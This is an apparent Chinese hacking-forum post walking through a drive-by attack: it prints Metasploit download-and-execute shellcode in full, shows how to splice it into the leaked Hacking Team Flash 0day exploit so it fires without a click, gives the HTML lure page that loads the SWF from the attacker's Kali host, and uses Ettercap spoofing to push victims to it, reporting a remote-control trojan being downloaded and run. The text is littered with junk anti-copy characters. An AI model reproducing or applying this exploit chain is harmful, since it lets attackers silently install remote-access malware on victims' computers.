中国网络渗透测试联盟

标题: flash 0day之手工代码修改制作下载者实例入侵演示 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: flash 0day之手工代码修改制作下载者实例入侵演示

K# m Q& s( P; O, G# u 三、flash 0day之手工代码修改制作下载者实例入侵演示 ! y2 C5 E( d) u, x: k7 c9 R

7 M! d, d- q1 \1 M

$ t0 r; C. x, ]3 n5 F& N) y 利用到的工具: , Y* @1 S+ S3 U, H' X

9 K f/ ~& M3 X( h* d3 B: O- x* T- s

- E, n3 ~. A0 e1 \ Msf 9 M5 v g$ Q/ G; U! n

; B9 I' Z# A' \8 K

# \" k2 ^2 x+ o Ettercap : }3 j8 H6 z3 J

7 n* o% C% o8 w& A

, w& ^9 Q+ ~2 I1 j Adobe Flash CS6 + O& C2 u) n4 F+ |) v

2 K; N( g" \: C @; L! ~. f

r& ]/ t) [, Q0 C Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ) e( N0 z( d# H3 f4 R

9 e! M, f& s( e5 h5 I' L/ O

" p4 E+ F' ^3 \ q7 ?! @& o4 A 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options * ]7 H [2 `0 x" T+ G* E1 Y( l2 Z

0 B, m" K0 @/ P* \; b; R* E# i: X% ]

% ^; S; h( v" j. I3 v7 Q0 w 如图: , B- B! n) T x6 C& ~/ h

7 F& G; Z: F6 l3 _4 r& u" f. h1 d i

- \& Z! H5 N4 H& Z* [8 z   % K, x9 n( Q1 a+ v

5 E+ I0 i Z& O% r1 n8 @

, @9 x. { d ~* t   5 ^, U& N5 k k& A

9 T8 r+ i3 @7 O* C1 ]/ ^

7 k! X+ U, p* V; c 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: e- t9 `3 m u/ g7 l

|* U9 C, z, }0 u' e/ h

$ O6 N+ m5 P& N$ w, e; R2 `# [8 w   ' S2 z7 L- l) J2 G7 Q r" {

$ v$ H$ n2 A. B! A

) }9 H J/ c3 P* ]   ! H& H( G/ |9 ~3 E [

5 j! t( S' M3 a/ I0 B! [

0 F: }& d% B" D) y1 x 然后执行generate -t dword生成shellcode,如下: 8 H6 A) Q( k( }9 \" H0 ]- s7 o6 ?* A

/ r) V9 r) k7 e, ]2 F2 A

* K( k' |$ K, u* z   1 p+ ~0 f0 \5 @; w7 E

9 v* l' Y; z7 _

4 i/ g/ X2 u( H 复制代码到文本下便于我们一会编辑flash exp,如下: - l; \2 h; D. H8 z3 j9 R$ P

# x2 f, \9 V. T6 w. Y3 Y, h# o

, k9 T. G& l- V* |$ l9 L, s; ` 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ; e% X, H1 a2 u# F

. b! Y# _- l- h4 Y7 v

2 r$ q/ H0 f* N* L( @5 G% ` 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 5 U u4 S4 J4 s" O+ _

7 U' e" v% I! l

1 y( P( k/ z0 w% e% n- _ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 3 u% k& Z/ ~# |" W% ?1 E4 L1 q

0 o- H7 d' E3 r' [/ R. H

2 r" |1 r- E3 }' S/ R 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 {0 J1 n9 |- e

) A. O- Z4 ]0 V4 b4 |; @/ y& m/ _

2 W r' o* }, \/ a" _5 \ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ) J+ K( v+ X$ i2 v0 D5 V

/ N# ?# s* u' O4 v) S- x C

* u, I8 F" y; r1 U3 D 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 9 R# \" |8 T I

& Z/ |! [8 w( c2 b7 k

/ \, s3 \' S) |4 U2 K 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, * c+ u/ \7 J6 _, x1 o( A9 S

. _+ ~1 A! n/ [* q

: B9 H" H0 w$ ~+ q4 D/ [ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 4 _% u3 A7 s" e

' j) u& T# R% M C1 j

- Z3 U" g' \: A* M 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 8 @7 m( \( p7 m! {% u* D

' |) [1 H+ C- P$ ~" T R

0 K1 J% l9 c) X 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, : K7 x; z% J% P8 h0 n: T

/ v, t4 l1 U. q- d' A! _

4 E8 p" _3 @( b" Y 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, , a' X" e1 O! q+ ]0 O

' t( `2 s. G- {' b6 q4 {

& B1 R. N6 }; [ 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 7 ?/ i8 s; ?( \: T3 d$ N) K

9 e: R) C5 k. @% A

4 ]+ e& }% M2 T+ l0 ~/ f+ [( N 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 0 g: `4 j) t# A8 w

, x" W9 H0 ~: j" ~# _

# l: u8 K1 S, |3 _* Q% J. N) P 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 8 B7 y- h' `, v1 u: Y& ~

! u- a% r2 B* I; ~2 Q3 g

9 D4 Y6 G: a3 F/ Q- N   . d# j6 T$ S% V. z% b v# K

5 X* N1 {" b* p

0 n2 \& s) n1 N7 |- o3 }2 {% O( i- B   $ U6 c, X% J, T. [$ A6 Z

9 V, j: D- n; Y+ G% A$ C3 C

" u& x P. S+ R3 B: h0 R# o. V 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ! T4 m0 E, E* y

# o( T. M4 N7 s$ J. }& K

1 Y z }: i2 C) f$ H; ]: x   3 E1 i- N, W9 e1 W: b3 t

& u! M( ^6 N' Y! X' L! ?

% e) M" \- ]9 X1 Y: m4 |% U 先修改ShellWin32.as,部分源代码如图: 3 y/ ^1 f; O- @; m& B1 Z

! s+ q+ g3 j- N- n p+ b' \5 `; E0 ~

; N. q4 k3 ~6 S$ t! D' J% _. l; B   . s& [& b# Z, E( ^

8 q6 M# d" S6 \- p& G: S3 d

, O7 N7 s" K1 v" C6 a 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: / g" i) ?: p3 s

) a: R# u- }* p4 }& K

0 O6 j( b8 \' p* Q9 L9 I" x4 B( p/ }4 w( @   I$ p) C1 }5 Y( ?

" H; b5 t* L+ D1 \

0 A9 F2 i1 m l, M, ^1 ~) O 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ! C" }+ C( |9 O, K

7 ? ` b' g/ H/ c: {

A- T! T4 h/ {   6 X' v" H8 v+ M8 q0 h0 e7 S

( K2 Y$ }5 ]- @( c

: Y% o' ]/ A# T4 t9 \4 \ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: & |! r! `8 ~- {3 ?

( o# h9 m! @; m

p- U, f" p6 i, H! E3 a1 B! L   6 l6 y* t5 Q- G/ v+ n

5 q* k* p; V$ `( B- A

$ ]% f- C$ E: u8 a$ p/ l   3 {: _9 l. D; ~4 x- ]! a

; j' N3 U; C0 z! I

( d7 R! y$ j0 S( w   8 b0 b: {4 O, o6 g9 a& Z. m* u9 s* C

. f' G( F) H7 z" Q9 ]

: ^7 P+ U" R8 G- n- ~) l) o( a8 K 然后点保存,下面我们来编译一下,打开 9 F1 X( s3 s: h0 s1 w8 |. F; c

) F9 y3 m/ j' F1 P8 l

) @; O' I! f5 X exp1.fla然后点文件-发布,看看编译没错误 9 l: D. k3 U( h# c! Z# r* z9 P# M$ {

^: e+ N; e' f0 ?; J- |( ^6 _

4 a6 I8 w9 J& Z8 u! u   1 c1 _* A; O) C& @/ k

7 A" x7 W1 a0 x- A# R) C2 u2 p

7 J" \. j& h3 K/ z1 C5 T   9 |6 v c' m: M

4 j; K& w; H0 z0 `1 @3 h) E

# @1 j; S) d: }: o" w   - ]' g& o6 j" }) ^( j

+ h6 M- p3 b: Q4 K

0 M5 q7 |3 m( D; o" e1 ^   / y$ e9 D, c7 B0 O4 Y3 _

- u y4 a: [* }7 \5 E# x9 F6 C

4 q4 S+ u5 l7 E! j" ~4 d 然后我们把生成的 # Q! Z+ f* |, K- |( A8 S

% Y# g* Q0 z# o7 b

( v5 U d* Y: r5 a6 _% U exp1.swf丢到kailinux /var/www/html下: & g; q6 s( e5 K

) c, e0 j5 S# u

( `/ ?, Y+ Z/ T- c, F- p 然后把这段代码好好编辑一下 ! ^- `0 O/ {' ?2 ^0 x$ y% ~

) A+ c/ P: V. w5 k9 N, H' D

2 I# e' u4 T9 }1 H/ V. ]   f7 ?- t; D+ @* z( k/ e

+ p; s& a+ g$ j7 a3 }

: r7 M7 W- w# E' W1 A2 Z   * I# T1 w; f, G' ~6 B/ t: e

' c r2 y3 n, R) ?7 w

+ l; g6 E, L b3 }1 k) C   + Z8 A- U5 z$ X" }

4 m0 }6 }! D0 B! b* d% i: i

8 M7 z9 w) T" Q a   % Y8 _8 l6 D/ y9 P8 u9 T

8 s S5 U+ h# Q* L* i! n

$ Y: n1 Y1 x- j5 B   ) ^% ?& U1 ?& ]: g: @. {% ]1 \% U0 g

3 h4 I4 S' B3 Y4 c6 N% Z* B; _

4 b6 U- x5 ~4 z' }   0 ]. v5 m, X1 j( w

' p6 Y' L: D2 F& R, R/ j9 P

' g+ K: C) u9 ]5 G: d: _ <!DOCTYPE html> ; O3 r& B5 l5 \ x

* _. P: `( ?; D5 X- P" c1 \

( g( s9 P% x' b% y _6 x <html> ( F J. J" v. f

7 p+ n9 ?" A- V# w1 r% Y$ B

. R0 `# @2 [( k3 @1 \ <head> $ r5 l4 @6 t* _

2 [5 l# A0 _! s' q( g$ U

2 F3 L' M0 a6 k5 J! G <meta http-equiv="Content-Type" content="text/html; - ?2 {/ ?) N; R

6 `' U2 y: z# p/ D! r+ w% v

( g, B' k' | e6 w% w1 a charset=utf-8"/> % w9 w* C c3 d6 i7 p( A8 F

% b5 J: R3 p- X8 {3 Y# |

( s. r5 s% u+ O4 P! V L3 q </head> ' Z$ w/ a- l8 z- z% a' c

- I6 p& l- M/ \5 Q

, y9 ~: O* P/ ~ F& l <body> 0 A& \; N' D1 s2 d

( f9 Q6 K6 q4 l9 s W% w) K' l

; F7 w r% a! d/ M- o" J$ g! d; r <h2> Please wait, the requested page is loading...</h2> . z ~' k9 f4 }: l; ~: k

& u, _' y! _" i5 A

2 }5 x6 g# B' `! p0 [6 U4 {! z <br> $ M4 H& M1 R) B0 [5 @

) v3 F% D; d1 M i0 P

1 V1 t; |* y1 x$ q5 A: R <OBJECT / ? X; D q2 P: e- y

5 D# C3 l- S/ l. R6 j

. M4 R; C9 k7 ^9 W! p7 c classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ! D& [6 w. l- z8 T; E

4 W/ P$ i. Y2 Y. M9 ]8 W6 G5 u) [

8 b; c" D1 k& n! A# q VALUE="http://192.168.0.109/exp1.swf"></OBJECT> + q, r3 g2 u0 i( |$ V6 k1 L2 j0 y" [

& k+ w6 w7 L% m P6 o

( \3 |4 t s3 S+ Q t4 A </body> 6 ]0 R4 V8 E5 ~8 H' {8 R

0 |' E2 V) P3 M1 D/ v' }: _8 f

- J; m% a* }1 R <script> % b( G+ y9 k0 `" |2 ]6 j4 V+ N0 {

5 c2 n5 U# K0 S8 W. _+ m

( Z' U& c; F* D     setTimeout(function () { 2 s, B4 M. y% _6 H4 \& N8 t4 t( }

" \" p {" Y' y* ]9 x/ k

2 V0 d! C7 \/ Q4 q          * S* Q3 u0 l, \# h) ?) [/ @. U0 [

; x1 K/ t2 @7 u* E2 M& t

. A4 v T" K8 b* l window.location.reload(); ' I: Y/ j2 ^' a. Y% m; N: @

5 ^; J1 q E( |: s1 H6 }

1 Q8 Z: x4 c3 f! l$ a8 u     }, 10000); $ S! ?( C8 G: A+ }$ c3 F

. \/ U/ A B3 d8 s. i

2 T$ j3 d% m) j4 f0 j; D2 h   P. |& ]+ ^, D" }5 |2 R X u

% b( ` S& p+ V {" m* f

8 w+ U0 J0 e- O) b" H </script> . G2 i2 U% K6 h% p, c3 s. }

8 b Y- ~, Z1 {' m$ u& M/ N

! {* C5 W; w8 a. i+ Q </html> ! @+ ?& R: n, W' z

2 m! g6 M/ p9 j; v# K! W

6 J- q1 w( @2 a4 [ l! I   2 h) j) w" d) X$ K+ G

) C; Y# s3 S$ g

, L9 Y8 ~/ e6 w% u6 I4 Y3 ]7 W: I: G 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 2 j5 f- P- v8 H5 t# b. r5 q0 |& o

: V9 f8 E4 N$ [& p

. H' U2 i- a D: w% C   8 l6 P1 s& F4 u8 p$ x

, G6 F( P) T* ?! J" J# A$ [

" t8 m0 l/ `1 i. x   # g1 u( ~$ B* s; l6 R9 N

6 @% l* B# a& g; H) E% M G

% q( M% x0 |$ X; z/ M# b3 Q   % S- ]8 c; E P8 k) O

9 y% J [* t4 z! q

# F' G7 I/ ~* f8 Z* l* c. i   ' k( q, \2 |$ B8 F& P

% S& n1 s X& R$ {

- X5 E# r' m! C2 i6 r; a: E   8 ~8 t1 ?, I* n3 J# h3 ^; E3 @& l

2 ^. u* F- A# k6 |2 G% U9 ~' X

: X% b; j9 k% }, I+ h 下面我们用ettercap欺骗如图: ) O0 k# j' P/ v* G7 u- q

; S$ C/ ^# g7 m' H; [/ i

; v! B" E8 g$ S7 L' g- l   & K, \" i- p" T% N* u* l

% \; O% c# c' z! ?

1 q7 s2 H7 U: }3 K% |8 a   $ v5 d. l# M( u

; u/ h9 o/ E3 B3 _0 u8 ?8 K) z0 O: e) r

% H3 G8 [- t5 [8 y 下面我们随便访问个网站看看: * q: w- S3 k I) _& O6 V5 Q

3 {" K2 ~4 I, S& g- H0 z5 {

, I" P+ l8 w! `5 j 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: / I/ M3 d$ q2 Y7 G; g8 o0 Z% u

6 _& Q- e1 X8 X. n0 ^- @3 c2 q% T, @

* ]/ a2 Z. u3 }. c0 G l8 _   ( e4 l& c1 d, _6 v9 Y# V7 W

C3 b: M- H" C$ ]

8 }6 n+ {3 G" L& Z; l5 ^9 d8 u& \ 我们看另一台, 9 _2 ^! K% W# |

5 r8 Z4 v! y0 M

0 ^" ^# R. `5 E) s 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 9 O# a. O& q- E7 q2 ^9 V






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2